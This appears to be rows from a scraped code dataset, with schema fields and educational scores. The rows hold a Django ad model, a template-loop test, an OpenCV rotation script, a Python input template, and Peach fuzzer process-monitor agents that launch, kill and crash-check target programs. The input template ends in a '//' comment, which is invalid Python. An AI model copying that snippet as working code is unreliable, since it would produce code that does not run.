max_stars_repo_path
stringlengths
4
286
max_stars_repo_name
stringlengths
5
119
max_stars_count
int64
0
191k
id
stringlengths
1
7
content
stringlengths
6
1.03M
content_cleaned
stringlengths
6
1.03M
language
stringclasses
111 values
language_score
float64
0.03
1
comments
stringlengths
0
556k
edu_score
float64
0.32
5.03
edu_int_score
int64
0
5
addle/models.py
makyo/addle
0
6618551
<filename>addle/models.py from django.contrib.auth.models import User from django.db import models class Ad(models.Model): """An advertisement submitted to be displayed on the site""" # The ad's owner owner = models.ForeignKey(User) # The ad's information image = models.ImageField() adult = models.BooleanField(default=False) destination = models.URLField(max_length=4096) class AdLifecycle(models.Model): """A lifecycle for a given ad.""" # The admin scheduling the ad admin_contact = models.ForeignKey(User) # The ad to be shown ad = models.ForeignKey(Ad) # Information about the lifecycle cost = models.DecimalField(max_digits=5, decimal_places=2) paid = models.BooleanField(default=False) live = models.BooleanField(default=False) start_date = models.DateField(null=True, blank=True) end_date = models.DateField(null=True, blank=True) # Information about the ad's activity impressions = models.PositiveIntegerField(default=0) interactions = models.PositiveIntegerField(default=0)
<filename>addle/models.py from django.contrib.auth.models import User from django.db import models class Ad(models.Model): """An advertisement submitted to be displayed on the site""" # The ad's owner owner = models.ForeignKey(User) # The ad's information image = models.ImageField() adult = models.BooleanField(default=False) destination = models.URLField(max_length=4096) class AdLifecycle(models.Model): """A lifecycle for a given ad.""" # The admin scheduling the ad admin_contact = models.ForeignKey(User) # The ad to be shown ad = models.ForeignKey(Ad) # Information about the lifecycle cost = models.DecimalField(max_digits=5, decimal_places=2) paid = models.BooleanField(default=False) live = models.BooleanField(default=False) start_date = models.DateField(null=True, blank=True) end_date = models.DateField(null=True, blank=True) # Information about the ad's activity impressions = models.PositiveIntegerField(default=0) interactions = models.PositiveIntegerField(default=0)
en
0.790676
An advertisement submitted to be displayed on the site # The ad's owner # The ad's information A lifecycle for a given ad. # The admin scheduling the ad # The ad to be shown # Information about the lifecycle # Information about the ad's activity
2.624669
3
tests/loops5.py
mauro-balades/yate
1
6618552
<filename>tests/loops5.py from yate import YateTemplate template = YateTemplate( """ <ul> {% each [1,4125,52312," hello "] as x %} <li>{{ x }}</li> {% end %} </ul> """ ) tmp = template.render(list=[1, 2, 3, 4]) print(tmp)
<filename>tests/loops5.py from yate import YateTemplate template = YateTemplate( """ <ul> {% each [1,4125,52312," hello "] as x %} <li>{{ x }}</li> {% end %} </ul> """ ) tmp = template.render(list=[1, 2, 3, 4]) print(tmp)
en
0.349405
<ul> {% each [1,4125,52312," hello "] as x %} <li>{{ x }}</li> {% end %} </ul>
2.493336
2
Transformations/RotationTranslation.py
sourabmaity/OpenCV_Basics
0
6618553
import cv2 import numpy as np cap = cv2.VideoCapture(0) cap.set(cv2.CAP_PROP_FRAME_WIDTH, 640) cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 480) print(cap.get(cv2.CAP_PROP_FPS)) height, width = 480, 640 center = (width / 2, height / 2) while True: success, img = cap.read() img = cv2.flip(img, 1) # print(img.shape) # Scaling cv2.resize(img,(400,400)) # To get the rotation matrix rotate_matrix = cv2.getRotationMatrix2D(center=center, angle=30, scale=1) # Rotate / Translate the image rotated_image = cv2.warpAffine(src=img, M=rotate_matrix, dsize=(width, height)) #tx, ty = width / 4, height / 4 # create the translation matrix using tx and ty, it is a NumPy array '''translation_matrix = np.array([ [1, 0, tx], [0, 1, ty] ], dtype=np.float32)''' pts1 = np.float32([[50, 50], [200, 50], [50, 200]]) pts2 = np.float32([[10, 100], [200, 50], [100, 250]]) M = cv2.getAffineTransform(pts1, pts2) # Affine Transformation pts1 = np.float32([[56, 65], [368, 52], [28, 387], [389, 390]]) pts2 = np.float32([[0, 0], [300, 0], [0, 300], [300, 300]]) M = cv2.getPerspectiveTransform(pts1, pts2) # Perspective Transformation cv2.imshow("Original", img) cv2.imshow("Rotated image", rotated_image) if cv2.waitKey(5) & 0xFF == 27: break cap.release() cv2.destroyAllWindows()
import cv2 import numpy as np cap = cv2.VideoCapture(0) cap.set(cv2.CAP_PROP_FRAME_WIDTH, 640) cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 480) print(cap.get(cv2.CAP_PROP_FPS)) height, width = 480, 640 center = (width / 2, height / 2) while True: success, img = cap.read() img = cv2.flip(img, 1) # print(img.shape) # Scaling cv2.resize(img,(400,400)) # To get the rotation matrix rotate_matrix = cv2.getRotationMatrix2D(center=center, angle=30, scale=1) # Rotate / Translate the image rotated_image = cv2.warpAffine(src=img, M=rotate_matrix, dsize=(width, height)) #tx, ty = width / 4, height / 4 # create the translation matrix using tx and ty, it is a NumPy array '''translation_matrix = np.array([ [1, 0, tx], [0, 1, ty] ], dtype=np.float32)''' pts1 = np.float32([[50, 50], [200, 50], [50, 200]]) pts2 = np.float32([[10, 100], [200, 50], [100, 250]]) M = cv2.getAffineTransform(pts1, pts2) # Affine Transformation pts1 = np.float32([[56, 65], [368, 52], [28, 387], [389, 390]]) pts2 = np.float32([[0, 0], [300, 0], [0, 300], [300, 300]]) M = cv2.getPerspectiveTransform(pts1, pts2) # Perspective Transformation cv2.imshow("Original", img) cv2.imshow("Rotated image", rotated_image) if cv2.waitKey(5) & 0xFF == 27: break cap.release() cv2.destroyAllWindows()
en
0.420292
# print(img.shape) # Scaling # To get the rotation matrix # Rotate / Translate the image #tx, ty = width / 4, height / 4 # create the translation matrix using tx and ty, it is a NumPy array translation_matrix = np.array([ [1, 0, tx], [0, 1, ty] ], dtype=np.float32) # Affine Transformation # Perspective Transformation
3.010693
3
Templates/Python.py
waba359/VAULT
1
6618554
<filename>Templates/Python.py from sys import stdin input = stdin.readline lmi = lambda: list(map(int, input().split())) mi = lambda: map(int, input().split()) si = lambda: input().strip('\n') ssi = lambda: input().strip('\n').split() //by @astrocat879
<filename>Templates/Python.py from sys import stdin input = stdin.readline lmi = lambda: list(map(int, input().split())) mi = lambda: map(int, input().split()) si = lambda: input().strip('\n') ssi = lambda: input().strip('\n').split() //by @astrocat879
none
1
2.74927
3
submissions/available/Johnson-CausalTesting/Holmes/fuzzers/Peach/Agent/process.py
brittjay0104/rose6icse
0
6618555
<filename>submissions/available/Johnson-CausalTesting/Holmes/fuzzers/Peach/Agent/process.py<gh_stars>0 # This Source Code Form is subject to the terms of the Mozilla Public # License, v. 2.0. If a copy of the MPL was not distributed with this # file, You can obtain one at http://mozilla.org/MPL/2.0/. import os import re import sys import time import json import shlex import signal import threading try: import Queue except ImportError: import queue from subprocess import Popen, STDOUT, PIPE, check_output try: # Todo: Test monitors on Windows and check Python 3 compatibility with PyWin32 import win32con import win32api import win32serviceutil # Todo: Find out which methods are used from this import and do it the right way. from win32process import * except: if sys.platform == 'win32': print("Warning: PyWin32 extensions not found, disabling various process monitors.") from Peach.agent import Monitor, MonitorDebug from Peach.Engine.common import PeachException from Peach.Utilities.common import * class PageHeap(Monitor): """ A monitor that will enable/disable pageheap on an executable. """ def __init__(self, args): try: self._path = os.path.join(args['Path'].replace("'''", ""), "gflags.exe") except: self._path = os.path.join(self.LocateWinDbg(), 'gflags.exe') self._exe = os.path.basename(args['Executable'].replace("'''", "")) self._onParams = ['gflags.exe', '/p', '/full', '/enable', self._exe] self._offParams = ['gflags.exe', '/p', '/disable', self._exe] try: os.spawnv(os.P_WAIT, self._path, self._onParams) except: print("Error, PageHeap failed to launch:") print("\tself._path:", self._path) print("\tself._onParams", self._onParams) raise def LocateWinDbg(self): # NOTE: Update master copy in debugger.py if you change this. try: hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, "Software\\Microsoft\\DebuggingTools") val, _ = win32api.RegQueryValueEx(hkey, "WinDbg") return val except: # Lets try a few common places before failing. pgPaths = [ "c:\\", os.environ["SystemDrive"] + "\\", os.environ["ProgramFiles"], ] if "ProgramW6432" in os.environ: pgPaths.append(os.environ["ProgramW6432"]) if "ProgramFiles(x86)" in os.environ: pgPaths.append(os.environ["ProgramFiles(x86)"]) dbgPaths = [ "Debuggers", "Debugger", "Debugging Tools for Windows", "Debugging Tools for Windows (x64)", "Debugging Tools for Windows (x86)", ] for p in pgPaths: for d in dbgPaths: testPath = os.path.join(p, d) if os.path.exists(testPath): return testPath print("Unable to locate gflags.exe!") def OnShutdown(self): os.spawnv(os.P_WAIT, self._path, self._offParams) class WindowsProcess(Monitor): """ Process control agent. This agent is able to start, stop, and monitor if a process is running. If the process exits early a fault will be issued to the fuzzer. """ def __init__(self, args): self.restartOnTest = False if args.has_key('RestartOnEachTest'): if args['RestartOnEachTest'].replace("'''", "").lower() == 'true': self.restartOnTest = True self.faultOnEarlyExit = True if args.has_key('FaultOnEarlyExit'): if args['FaultOnEarlyExit'].replace("'''", "").lower() != 'true': self.faultOnEarlyExit = False self.startOnCall = False if args.has_key('StartOnCall'): self.startOnCall = True self.startOnCallMethod = args['StartOnCall'].replace("'''", "").lower() self.waitForExitOnCall = False if args.has_key('WaitForExitOnCall'): self.waitForExitOnCall = True self.waitForExitOnCallMethod = args['WaitForExitOnCall'].replace("'''", "").lower() if not args.has_key('Command'): raise PeachException("Error, monitor Process requires a parameter named 'Command'") self.strangeExit = False self.command = args["Command"].replace("'''", "") self.args = None self.pid = None self.hProcess = None self.hThread = None self.dwProcessId = None self.dwThreadId = None def PublisherCall(self, method): method = method.lower() if self.startOnCall and self.startOnCallMethod == method: print("Process: startOnCall, starting process!") self._StopProcess() self._StartProcess() elif self.waitForExitOnCall and self.waitForExitOnCallMethod == method: print("Process: waitForExitOnCall, waiting on process exit") while True: if not self._IsProcessRunning: print("Process: Process exitted") return time.sleep(0.25) def _StopProcess(self): if self.hProcess is None: return if self._IsProcessRunning(): TerminateProcess(self.hProcess, 0) self.hProcess = None self.hThread = None self.dwProcessId = None self.dwThreadId = None def _StartProcess(self): if self.hProcess is not None: self._StopProcess() hProcess, hThread, dwProcessId, dwThreadId = CreateProcess(None, self.command, None, None, 0, 0, None, None, STARTUPINFO()) self.hProcess = hProcess self.hThread = hThread self.dwProcessId = dwProcessId self.dwThreadId = dwThreadId def _IsProcessRunning(self): if self.hProcess is None: return False ret = GetExitCodeProcess(self.hProcess) if ret != win32con.STILL_ACTIVE: return False ret = GetExitCodeThread(self.hThread) if ret != win32con.STILL_ACTIVE: return False return True def OnTestStarting(self): self.strangeExit = False if not self.startOnCall and (self.restartOnTest or not self._IsProcessRunning()): self._StopProcess() self._StartProcess() elif self.startOnCall: self._StopProcess() def OnTestFinished(self): if not self._IsProcessRunning(): self.strangeExit = True if self.restartOnTest: self._StopProcess() elif self.startOnCall: self._StopProcess() def GetMonitorData(self): if self.strangeExit: return {"WindowsProcess.txt": "Process exited early"} return None def DetectedFault(self): if self.faultOnEarlyExit: return not self._IsProcessRunning() else: return False def OnFault(self): self._StopProcess() def OnShutdown(self): self._StopProcess() class Process(Monitor): """ Process control agent. This agent is able to start, stop, and monitor if a process is running. If the process exits early a fault will be issued to the fuzzer. """ def __init__(self, args): self.restartOnTest = False if args.has_key('RestartOnEachTest'): if args['RestartOnEachTest'].replace("'''", "").lower() == 'true': self.restartOnTest = True self.faultOnEarlyExit = True if args.has_key('FaultOnEarlyExit'): if args['FaultOnEarlyExit'].replace("'''", "").lower() != 'true': self.faultOnEarlyExit = False self.startOnCall = False if args.has_key('StartOnCall'): self.startOnCall = True self.startOnCallMethod = args['StartOnCall'].replace("'''", "").lower() self.waitForExitOnCall = False if args.has_key('WaitForExitOnCall'): self.waitForExitOnCall = True self.waitForExitOnCallMethod = args['WaitForExitOnCall'].replace("'''", "").lower() if not args.has_key('Command'): raise PeachException("Error, monitor Process requires a parameter named 'Command'") self.strangeExit = False self.command = args["Command"].replace("'''", "") self.args = self.command.split() self.pid = None self.process = None def PublisherCall(self, method): method = method.lower() if self.startOnCall and self.startOnCallMethod == method: print("Process: startOnCall, starting process!") self._StopProcess() self._StartProcess() elif self.waitForExitOnCall and self.waitForExitOnCallMethod == method: print("Process: waitForExitOnCall, waiting on process exit") while True: if not self._IsProcessRunning(): print("Process: Process exitted") return time.sleep(0.25) def _StopProcess(self): print("Process._StopProcess") if not self.process: return if self._IsProcessRunning(): try: os.kill(self.process.pid, signal.SIGTERM) os.kill(self.process.pid, signal.SIGKILL) except: pass self.process.wait() self.process = None def _StartProcess(self): print("Process._StartProcess") if self.process: self._StopProcess() self.process = Popen(self.args) def _IsProcessRunning(self): if self.process is None: print("Process._IsProcessRunning: False (self.process == None)") return False if self.process.poll() is not None: print("Process._IsProcessRunning: False (self.process.poll != None)") return False print("Process._IsProcessRunning: True") return True def OnTestStarting(self): self.strangeExit = False if not self.startOnCall and (self.restartOnTest or not self._IsProcessRunning()): print("Process.OnTestStarting: Stopping and starting process") self._StopProcess() self._StartProcess() elif self.startOnCall: print("Process.OnTestStarting: Stopping process") self._StopProcess() print("Exiting OnTestStarting...") def OnTestFinished(self): if not self._IsProcessRunning(): self.strangeExit = True if self.restartOnTest: print("Process.OnTestFinished: Stopping process") self._StopProcess() elif self.startOnCall: print("Process.OnTestFinished: Stopping process") self._StopProcess() def GetMonitorData(self): if self.strangeExit: return {"Process.txt": "Process exited early"} return None def DetectedFault(self): if self.faultOnEarlyExit: return self.strangeExit else: return False def OnFault(self): self._StopProcess() def OnShutdown(self): self._StopProcess() class WindowsService(Monitor): """ Controls a windows service making sure it's started, optionally restarting, etc. """ def __init__(self, args): if args.has_key('RestartOnEachTest'): if args['RestartOnEachTest'].lower() == 'true': self.restartOnTest = True else: self.restartOnTest = False else: self.restartOnTest = False if args.has_key('FaultOnEarlyExit'): if args['FaultOnEarlyExit'].lower() == 'true': self.faultOnEarlyExit = True else: self.faultOnEarlyExit = False else: self.faultOnEarlyExit = True self.strangeExit = False self.service = args["Service"].replace("'''", "") if args.has_key("Machine"): self.machine = args["Machine"].replace("'''", "") else: self.machine = None def _StopProcess(self): win32serviceutil.StopService(self.service, self.machine) while win32serviceutil.QueryServiceStatus(self.service, self.machine)[1] == 3: time.sleep(0.25) if win32serviceutil.QueryServiceStatus(self.service, self.machine)[1] != 1: raise Exception("WindowsService: Unable to stop service!") def _StartProcess(self): if self._IsProcessRunning(): return win32serviceutil.StartService(self.service, self.machine) while win32serviceutil.QueryServiceStatus(self.service, self.machine)[1] == 2: time.sleep(0.25) if win32serviceutil.QueryServiceStatus(self.service, self.machine)[1] == 4: raise Exception("WindowsService: Unable to start service!") def _IsProcessRunning(self): if win32serviceutil.QueryServiceStatus(self.service, self.machine)[1] == 4: return True return False def OnTestStarting(self): self.strangeExit = False if self.restartOnTest or not self._IsProcessRunning(): self._StopProcess() self._StartProcess() def OnTestFinished(self): if not self._IsProcessRunning(): self.strangeExit = True if self.restartOnTest: self._StopProcess() def GetMonitorData(self): if self.strangeExit: return {"WindowsService.txt": "Process exited early"} return None def DetectedFault(self): #if self.faultOnEarlyExit: # return not self._IsProcessRunning() # #else: # return False return False def OnFault(self): self._StopProcess() def OnShutdown(self): pass class ProcessKiller(Monitor): """Will watch for specific process and kill.""" def __init__(self, args): self._name = "ProcessWatcher" if not args.has_key("ProcessNames"): raise Exception("ProcessWatcher requires a parameter named ProcessNames.") self._names = args["ProcessNames"].replace("'''", "").split(',') def OnTestStarting(self): pass def OnTestFinished(self): for name in self._names: os.popen('TASKKILL /IM ' + name + ' /F') time.sleep(.6) def DetectedFault(self): return False def OnShutdown(self): try: for name in self._names: os.popen('TASKKILL /IM ' + name + ' /F') time.sleep(.6) except: pass class ProcessID(Monitor): """ Monitors CrashReporter on MacOS, LinuxApport on Linux and the process id of a process. There are external monitors present for CrashReporter and LinuxApport but applying them means having a delay between each testcase because they will wait and observe a folder for a crash report after each test case. This monitor tries to observe the process id for a change and will only after observe a specific folder for a crash report. The monitor does not work with child processes like plugin processes. """ def __init__(self, args): Monitor.__init__(self, args) self._name = "ProcessID" self.command = getStringAttribute(args, "Command") if not self.command: raise ValueError("Command not provided or empty in %s" % __file__) self.arguments = shlex.split(self.command) + shlex.split(getStringAttribute(args, "Arguments")) self.process_environment = getStringAttribute(args, "Environment") if self.process_environment: os.environ.update(dict([p.split("=") for p in self.process_environment.split("|")])) self.asan_options = getStringAttribute(args, "ASanOptions") if self.asan_options: os.environ["ASAN_OPTIONS"] = "%s" % self.asan_options self.asan_library_path = getStringAttribute(args, "ASanMacOSRuntime") if isMacOS and self.asan_library_path: os.environ["DYLD_LIBRARY_PATH"] = getStringAttribute(args, "ASanMacOSRuntime") self.asan_symbolizer = getStringAttribute(args, "ASanSymbolizer") if self.asan_symbolizer: os.environ["ASAN_SYMBOLIZER_PATH"] = self.asan_symbolizer self.heartbeat = getFloatAttribute(args, "Heartbeat", "0.0") self.monitor_console = getBooleanAttribute(args, "NoConsoleLogging") self.gdb_cmd_batch = getStringAttribute(args, "GDBCommands") self.print_subprocess_output = getBooleanAttribute(args, "PrintSubprocessOutput") self.lookout_time = getFloatAttribute(args, "LookoutTime", "5.0") self.system_report_path = getStringAttribute(args, 'LogFolder') if self.system_report_path and not os.path.isdir(self.system_report_path): raise ValueError("Provided path for LogFolder is invalid.") elif isMacOS(): self.system_report_path = os.path.join(os.environ['HOME'], "Library/Logs/DiagnosticReports") if os.path.isdir(self.system_report_path): try: os.makedirs(self.system_report_path) except (IOError, OSError) as e: if e.errno != 17: raise self.pid = self.process = None self.console_log = self.crash_trace = [] self.failure = False self.first_run = True def OnTestStarting(self): if not self._IsRunning(): self._StartProcess() def _StartProcess(self): print("Command: {}".format(self.arguments)) self.process = Popen(self.arguments, stderr=STDOUT, stdout=PIPE, env=os.environ, bufsize=1, close_fds=isPosix()) self.pid = self.process.pid def enqueue_output(out, queue): for line in iter(out.readline, ""): queue.put(line) out.close() self.terminal_queue = Queue.Queue() self.terminal_producer = threading.Thread(target=enqueue_output, args=(self.process.stdout, self.terminal_queue)) self.terminal_consumer = threading.Thread(target=self._grab_sanitizer_trace) self.terminal_producer.setDaemon(True) self.terminal_consumer.setDaemon(True) self.terminal_producer.start() self.terminal_consumer.start() def _IsRunning(self): if self.process is None: MonitorDebug(self._name, "IsRunning: False (self.process == None") return False if self.process.poll() is not None: MonitorDebug(self._name, "IsRunning: False (self.process.poll != None)") return False MonitorDebug(self._name, "IsRunning: True") return True def _grab_sanitizer_trace(self): """Run in the background and set self.failure to true once an ASan crash got detected.""" inside_sanitizer_trace = False self.crash_trace = [] while True: captured_line = self.terminal_queue.get() if self.print_subprocess_output: print(captured_line.strip("\n")) if self.monitor_console: self.console_log.append(captured_line) if not inside_sanitizer_trace: if captured_line.find("ERROR: AddressSanitizer") != -1 and captured_line.find("AddressSanitizer failed to allocate") == -1: inside_sanitizer_trace = True if inside_sanitizer_trace and \ (captured_line.find("Stats: ") != -1 or captured_line.find("ABORTING") != -1 or captured_line.find("ERROR: Failed") != -1): inside_sanitizer_trace = False self.failure = True break if inside_sanitizer_trace: self.crash_trace.append(captured_line) if self.failure and self._IsRunning(): self.process.terminate() self.process.kill() self.process = None def OnTestFinished(self): self.console_log = [] if not self._IsRunning(): self.failure = True time.sleep(self.heartbeat) def _from_core_dump(self, log_folder): core_filename = os.path.join(log_folder, 'core.%s' % str(self.pid)) if os.path.exists(core_filename): gdb_args = ["gdb", "-n", "-batch", "-x", self.gdb_cmd_batch, self.command, core_filename] gdb_output = check_output(gdb_args, stdin=None, stderr=STDOUT, close_fds=isPosix()) os.remove(core_filename) return gdb_output def _from_crash_reporter(self, log_folder): report = "" for fname in os.listdir(log_folder): if not fname.endswith(".crash"): continue with open(os.path.join(log_folder, fname)) as fd: content = fd.readlines() try: crash_pid = int(re.findall("\[(\d+)\]", content[0])[0]) except: continue if crash_pid == self.pid: report = "".join(content) os.remove(os.path.join(log_folder, fname)) break return report def get_crash_report(self, log_folder): if not os.path.isdir(log_folder): return "" if isMacOS(): return self._from_crash_reporter(log_folder) if isLinux(): return self._from_core_dump(log_folder) def DetectedFault(self): return self.failure def GetMonitorData(self): time.sleep(self.lookout_time) sytem_crash_report = self.get_crash_report(self.system_report_path) bucket = {} if not len(self.crash_trace): if self.process.returncode < 0: crashSignals = [ # POSIX.1-1990 signals signal.SIGILL, signal.SIGABRT, signal.SIGFPE, signal.SIGSEGV, # SUSv2 / POSIX.1-2001 signals signal.SIGBUS, signal.SIGSYS, signal.SIGTRAP, ] for crashSignal in crashSignals: if process.returncode == -crashSignal: bucket["auxdat.txt"] = "Process exited with signal: %d" % -process.returncode else: bucket["auxdat.txt"] = "".join(self.crash_trace) if sytem_crash_report: bucket["system_crash_report.txt"] = sytem_crash_report if self.console_log: bucket["stdout.txt"] = "".join(self.console_log[-1000:]) if self.failure: meta = { "environ": os.environ.data, "command": self.arguments } bucket["meta.txt"] = json.dumps(dict(meta)) bucket["Bucket"] = os.path.basename(self.command) return bucket def OnFault(self): self._StopProcess() def OnShutdown(self): self._StopProcess() def _StopProcess(self): self.failure = False if self._IsRunning(): try: MonitorDebug(self._name, "calling terminate()") self.process.terminate() MonitorDebug(self._name, "calling kill()") self.process.kill() except Exception: print(sys.exc_info()) self.process.wait() self.process = None class ASanConsoleMonitor(Monitor): def __init__(self, args): Monitor.__init__(self, args) self._name = "ASanConsoleMonitor" self.command = getStringAttribute(args, "Command") if not self.command: raise ValueError("Command not provided or empty in %s" % __file__) self.arguments = shlex.split(self.command) + shlex.split(getStringAttribute(args, "Arguments")) self.process_environment = getStringAttribute(args, "Environment") if self.process_environment: os.environ.update(dict([p.split("=") for p in self.process_environment.split("|")])) self.asan_options = getStringAttribute(args, "ASanOptions") if self.asan_options: os.environ["ASAN_OPTIONS"] = "%s" % self.asan_options self.asan_library_path = getStringAttribute(args, "ASanMacOSRuntime") if isMacOS and self.asan_library_path: os.environ["DYLD_LIBRARY_PATH"] = getStringAttribute(args, "ASanMacOSRuntime") self.asan_symbolizer = getStringAttribute(args, "ASanSymbolizer") if self.asan_symbolizer: os.environ["ASAN_SYMBOLIZER_PATH"] = self.asan_symbolizer if "StartOnCall" in args: self.start_on_call = True self.OnCallMethod = getStringAttribute(args, 'StartOnCall') else: self.start_on_call = False self.asan_regex = "(ERROR: AddressSanitizer:.*[Stats:|ABORTING|ERROR: Failed])" self.stderr = [] self.stdout = [] self.sanlog = [] self.process = None self.failure = False def OnTestStarting(self): if not self.start_on_call and not self._IsRunning(): self._StopProcess() self._StartProcess() elif self.start_on_call: self._StopProcess() def PublisherCall(self, method): if self.start_on_call and self.OnCallMethod == method: MonitorDebug(self._name, "PublisherCall") self._StopProcess() self._StartProcess() def _IsRunning(self): if self.process is None: MonitorDebug(self._name, "IsRunning: False (self.process == None") return False if self.process.poll() is not None: MonitorDebug(self._name, "IsRunning: False (self.process.poll != None)") return False MonitorDebug(self._name, "IsRunning: True") return True def _StartProcess(self): MonitorDebug(self._name, "_StartProcess") self.failure = False self.sanlog = [] self.stderr = [] self.stdout = [] print("Command: {}".format(self.arguments)) self.process = Popen(self.arguments, stderr=PIPE, stdout=PIPE, env=os.environ, bufsize=1, close_fds=isPosix()) # Todo: Add timeout= for GUI applications. stdout, stderr = self.process.communicate() if stderr.find("ERROR: AddressSanitizer: ") != -1: if stderr.find("AddressSanitizer failed to allocate") == -1: self.failure = True self.sanlog = re.findall(self.asan_regex, stderr, re.DOTALL)[0] self.stdout = stdout self.stderr = stderr else: if self.process.returncode < 0: crashSignals = [ # POSIX.1-1990 signals signal.SIGILL, signal.SIGABRT, signal.SIGFPE, signal.SIGSEGV, # SUSv2 / POSIX.1-2001 signals signal.SIGBUS, signal.SIGSYS, signal.SIGTRAP, ] for crashSignal in crashSignals: if process.returncode == -crashSignal: self.failure = True self.sanlog = "Process exited with signal: %d" % -process.returncode self.stdout = stdout self.stderr = stderr if self.failure: self._StopProcess() def OnTestFinished(self): if self._IsRunning(): self._StopProcess() def DetectedFault(self): return self.failure def GetMonitorData(self): #if not self.failure: # return bucket = {} if self.sanlog: bucket["auxdat.txt"] = "".join(self.sanlog) if self.stdout: bucket["stdout.txt"] = "".join(self.stdout) if self.stderr: bucket["stderr.txt"] = "".join(self.stderr) meta = { "environ": os.environ.data, "command": self.arguments, "returncode": self.process.returncode } bucket["meta.txt"] = json.dumps(dict(meta)) bucket["Bucket"] = os.path.basename(self.command) return bucket def OnFault(self): self._StopProcess() def OnShutdown(self): self._StopProcess() def _StopProcess(self): if not self.process: return if self._IsRunning(): try: MonitorDebug(self._name, "calling terminate()") self.process.terminate() MonitorDebug(self._name, "calling kill()") self.process.kill() except Exception: print(sys.exc_info()) self.process.wait() self.process = None
<filename>submissions/available/Johnson-CausalTesting/Holmes/fuzzers/Peach/Agent/process.py<gh_stars>0 # This Source Code Form is subject to the terms of the Mozilla Public # License, v. 2.0. If a copy of the MPL was not distributed with this # file, You can obtain one at http://mozilla.org/MPL/2.0/. import os import re import sys import time import json import shlex import signal import threading try: import Queue except ImportError: import queue from subprocess import Popen, STDOUT, PIPE, check_output try: # Todo: Test monitors on Windows and check Python 3 compatibility with PyWin32 import win32con import win32api import win32serviceutil # Todo: Find out which methods are used from this import and do it the right way. from win32process import * except: if sys.platform == 'win32': print("Warning: PyWin32 extensions not found, disabling various process monitors.") from Peach.agent import Monitor, MonitorDebug from Peach.Engine.common import PeachException from Peach.Utilities.common import * class PageHeap(Monitor): """ A monitor that will enable/disable pageheap on an executable. """ def __init__(self, args): try: self._path = os.path.join(args['Path'].replace("'''", ""), "gflags.exe") except: self._path = os.path.join(self.LocateWinDbg(), 'gflags.exe') self._exe = os.path.basename(args['Executable'].replace("'''", "")) self._onParams = ['gflags.exe', '/p', '/full', '/enable', self._exe] self._offParams = ['gflags.exe', '/p', '/disable', self._exe] try: os.spawnv(os.P_WAIT, self._path, self._onParams) except: print("Error, PageHeap failed to launch:") print("\tself._path:", self._path) print("\tself._onParams", self._onParams) raise def LocateWinDbg(self): # NOTE: Update master copy in debugger.py if you change this. try: hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, "Software\\Microsoft\\DebuggingTools") val, _ = win32api.RegQueryValueEx(hkey, "WinDbg") return val except: # Lets try a few common places before failing. pgPaths = [ "c:\\", os.environ["SystemDrive"] + "\\", os.environ["ProgramFiles"], ] if "ProgramW6432" in os.environ: pgPaths.append(os.environ["ProgramW6432"]) if "ProgramFiles(x86)" in os.environ: pgPaths.append(os.environ["ProgramFiles(x86)"]) dbgPaths = [ "Debuggers", "Debugger", "Debugging Tools for Windows", "Debugging Tools for Windows (x64)", "Debugging Tools for Windows (x86)", ] for p in pgPaths: for d in dbgPaths: testPath = os.path.join(p, d) if os.path.exists(testPath): return testPath print("Unable to locate gflags.exe!") def OnShutdown(self): os.spawnv(os.P_WAIT, self._path, self._offParams) class WindowsProcess(Monitor): """ Process control agent. This agent is able to start, stop, and monitor if a process is running. If the process exits early a fault will be issued to the fuzzer. """ def __init__(self, args): self.restartOnTest = False if args.has_key('RestartOnEachTest'): if args['RestartOnEachTest'].replace("'''", "").lower() == 'true': self.restartOnTest = True self.faultOnEarlyExit = True if args.has_key('FaultOnEarlyExit'): if args['FaultOnEarlyExit'].replace("'''", "").lower() != 'true': self.faultOnEarlyExit = False self.startOnCall = False if args.has_key('StartOnCall'): self.startOnCall = True self.startOnCallMethod = args['StartOnCall'].replace("'''", "").lower() self.waitForExitOnCall = False if args.has_key('WaitForExitOnCall'): self.waitForExitOnCall = True self.waitForExitOnCallMethod = args['WaitForExitOnCall'].replace("'''", "").lower() if not args.has_key('Command'): raise PeachException("Error, monitor Process requires a parameter named 'Command'") self.strangeExit = False self.command = args["Command"].replace("'''", "") self.args = None self.pid = None self.hProcess = None self.hThread = None self.dwProcessId = None self.dwThreadId = None def PublisherCall(self, method): method = method.lower() if self.startOnCall and self.startOnCallMethod == method: print("Process: startOnCall, starting process!") self._StopProcess() self._StartProcess() elif self.waitForExitOnCall and self.waitForExitOnCallMethod == method: print("Process: waitForExitOnCall, waiting on process exit") while True: if not self._IsProcessRunning: print("Process: Process exitted") return time.sleep(0.25) def _StopProcess(self): if self.hProcess is None: return if self._IsProcessRunning(): TerminateProcess(self.hProcess, 0) self.hProcess = None self.hThread = None self.dwProcessId = None self.dwThreadId = None def _StartProcess(self): if self.hProcess is not None: self._StopProcess() hProcess, hThread, dwProcessId, dwThreadId = CreateProcess(None, self.command, None, None, 0, 0, None, None, STARTUPINFO()) self.hProcess = hProcess self.hThread = hThread self.dwProcessId = dwProcessId self.dwThreadId = dwThreadId def _IsProcessRunning(self): if self.hProcess is None: return False ret = GetExitCodeProcess(self.hProcess) if ret != win32con.STILL_ACTIVE: return False ret = GetExitCodeThread(self.hThread) if ret != win32con.STILL_ACTIVE: return False return True def OnTestStarting(self): self.strangeExit = False if not self.startOnCall and (self.restartOnTest or not self._IsProcessRunning()): self._StopProcess() self._StartProcess() elif self.startOnCall: self._StopProcess() def OnTestFinished(self): if not self._IsProcessRunning(): self.strangeExit = True if self.restartOnTest: self._StopProcess() elif self.startOnCall: self._StopProcess() def GetMonitorData(self): if self.strangeExit: return {"WindowsProcess.txt": "Process exited early"} return None def DetectedFault(self): if self.faultOnEarlyExit: return not self._IsProcessRunning() else: return False def OnFault(self): self._StopProcess() def OnShutdown(self): self._StopProcess() class Process(Monitor): """ Process control agent. This agent is able to start, stop, and monitor if a process is running. If the process exits early a fault will be issued to the fuzzer. """ def __init__(self, args): self.restartOnTest = False if args.has_key('RestartOnEachTest'): if args['RestartOnEachTest'].replace("'''", "").lower() == 'true': self.restartOnTest = True self.faultOnEarlyExit = True if args.has_key('FaultOnEarlyExit'): if args['FaultOnEarlyExit'].replace("'''", "").lower() != 'true': self.faultOnEarlyExit = False self.startOnCall = False if args.has_key('StartOnCall'): self.startOnCall = True self.startOnCallMethod = args['StartOnCall'].replace("'''", "").lower() self.waitForExitOnCall = False if args.has_key('WaitForExitOnCall'): self.waitForExitOnCall = True 